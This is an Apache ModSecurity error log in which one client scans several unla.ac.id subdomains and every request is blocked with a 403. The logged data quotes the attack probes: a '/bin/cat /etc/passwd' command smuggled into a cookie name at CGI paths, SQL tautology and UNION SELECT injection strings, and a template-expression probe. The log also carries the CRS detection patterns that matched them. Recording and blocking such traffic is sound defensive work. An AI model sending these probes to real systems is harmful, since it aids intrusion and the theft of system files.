[Tue Aug 29 11:33:39.313362 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/test"] [unique_id "ZO11I8Co-f0AAAOJKf0AAAAE"]
[Tue Aug 29 11:33:39.324667 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11I8Co-f0AAARo81kAAAAT"]
[Tue Aug 29 11:33:39.359129 2023] [:error] [pid 905] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAAOJKf8AAAAE"]
[Tue Aug 29 11:33:39.366798 2023] [:error] [pid 876] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAANsAjEAAAAD"]
[Tue Aug 29 11:33:39.375073 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11I8Co-f0AAARv7UMAAAAY"]
[Tue Aug 29 11:33:40.295609 2023] [:error] [pid 1152] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "pusatbahasa.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAASAHbwAAAAH"]
[Tue Aug 29 11:33:40.298768 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "informatika.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARjjPQAAAAL"]
[Tue Aug 29 11:33:40.301107 2023] [:error] [pid 1153] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAASBXRoAAAAM"]
[Tue Aug 29 11:33:40.301170 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  'MwLj'='MwLj found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5435' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARy-xMAAAAb"]
[Tue Aug 29 11:33:40.381487 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JMCo-f0AAARjjPgAAAAL"]
[Tue Aug 29 11:33:40.386580 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11JMCo-f0AAAQKOnoAAAAs"]
[Tue Aug 29 11:33:40.404111 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/cgi-bin/status/status.cgi"] [unique_id "ZO11JMCo-f0AAARtAAUAAAAV"]
[Tue Aug 29 11:33:40.406932 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "pusatbahasa.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAAQKOnsAAAAs"]
[Tue Aug 29 11:33:40.421255 2023] [:error] [pid 1123] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:id: YHLbGR%{128*128}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "journal.unla.ac.id"] [uri "/"] [unique_id "ZO11JMCo-f0AAARjjPoAAAAL"]
[Tue Aug 29 11:33:40.452943 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JMCo-f0AAARy-xoAAAAb"]
[Tue Aug 29 11:33:40.458715 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "pusatbahasa.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARv7UwAAAAY"]
[Tue Aug 29 11:33:40.464164 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "journal.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARtAAgAAAAV"]
[Tue Aug 29 11:33:40.467406 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "ft.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JMCo-f0AAARo82QAAAAT"]
[Tue Aug 29 11:33:41.303271 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "pusatbahasa.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARo82UAAAAT"]
[Tue Aug 29 11:33:41.305361 2023] [:error] [pid 1133] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "journal.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAARtAAkAAAAV"]
[Tue Aug 29 11:33:41.316014 2023] [:error] [pid 1150] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "informatika.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAAR@KHAAAAAF"]
[Tue Aug 29 11:33:41.328954 2023] [:error] [pid 1034] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:query. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: %\\xe9\\x8c\\xa6'  found within ARGS:query: aa%\\xe9\\x8c\\xa6' union select 1,md5(999999999),3#'"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "ft.unla.ac.id"] [uri "/plus/ajax_common.php"] [unique_id "ZO11JcCo-f0AAAQKOoAAAAAs"]
[Tue Aug 29 11:33:41.346489 2023] [:error] [pid 1135] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "informatika.unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JcCo-f0AAARv7VAAAAAY"]
[Tue Aug 29 11:33:41.347630 2023] [:error] [pid 1128] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within REQUEST_COOKIES_NAMES:/bin/cat /etc/passwd: /bin/cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "unla.ac.id"] [uri "/test.cgi"] [unique_id "ZO11JcCo-f0AAARo82cAAAAT"]
[Tue Aug 29 11:33:41.427769 2023] [:error] [pid 1104] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "journal.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARQ4BEAAAAB"]
[Tue Aug 29 11:33:41.427859 2023] [:error] [pid 1138] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:USERDBDomains.Domainname. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data:  '5434'='5434 found within ARGS:USERDBDomains.Domainname: geardomain' AND '5434'='5434' AND 'MwLj'='MwLj"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "ft.unla.ac.id"] [uri "/scgi-bin/platform.cgi"] [unique_id "ZO11JcCo-f0AAARy-yIAAAAb"]
